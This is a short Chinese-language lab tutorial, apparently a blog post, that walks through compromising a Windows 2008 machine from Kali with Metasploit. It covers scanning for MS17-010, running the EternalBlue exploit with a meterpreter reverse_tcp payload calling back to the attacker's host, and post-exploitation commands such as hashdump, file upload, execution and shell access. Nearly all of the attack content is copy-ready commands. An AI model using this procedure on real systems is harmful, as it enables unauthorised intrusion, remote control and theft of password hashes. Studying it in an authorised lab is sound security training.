msf进入windows2008
相关环境 攻击机kali 靶机windows2008
metasploit模块简介
Auxiliary 辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持
Exploits 攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。
Payload 攻击载荷模块 攻击成功后促使靶机运行的一段植入代码
Post 后渗透攻击模块 收集更多信息或进一步访问被利用的目标系统
Encoders 编码模块 将攻击载荷进行编码,来绕过防护软件拦截
开始
开启数据库:service postgresql start
初始化msf数据库:msfdb init
开启MSF:msfconsole
查看数据连接状态:db_status
根据名称搜索 : search ms17_010
设置模块:use auxiliary/scanner/smb/smb_ms17_010 (也可用 use 3 进行设置)

options查看选项
扫描靶机 msf > use auxiliary/scanner/smb/smb_ms17_010
options
设置目标地址:set RHOSTS 192.168.174.1
设置目标地址:set RPORT 445
扫描 run/exploit (+表示可行)
攻击靶机 use exploit/windows/smb/ms17_010_eternalblue
options
设置目标地址:set RHOSTS 192.168.174.1
设置目标地址:set RPORT 445
选择payload set payload windows/x64/meterpreter/reverse_tcp
options
设置本地地址:set LHOST 192.168.174.23
攻击 run/exploit
进入后相关命令
查看用户权限: meterpreter> getuid
获取hash密码: meterpreter> hashdump
上传文件: meterpreter> upload
执行文件: meterpreter> execute -f notepad.exe
获取屏幕截图:meterpreter>screenshot
获取shell:meterpreter>shell

简单好用的帮助指令
help/? 帮助菜单
exit 退出MSF控制台
Back 返回上一级
info 显示一个或者多个模块的信息
show 显示所给类型的模块
background 将当前操作在后台运行
use 使用所选择的模块
set 设置选项
unset 取消设置的选项
session 会话

浙公网安备 33010602011771号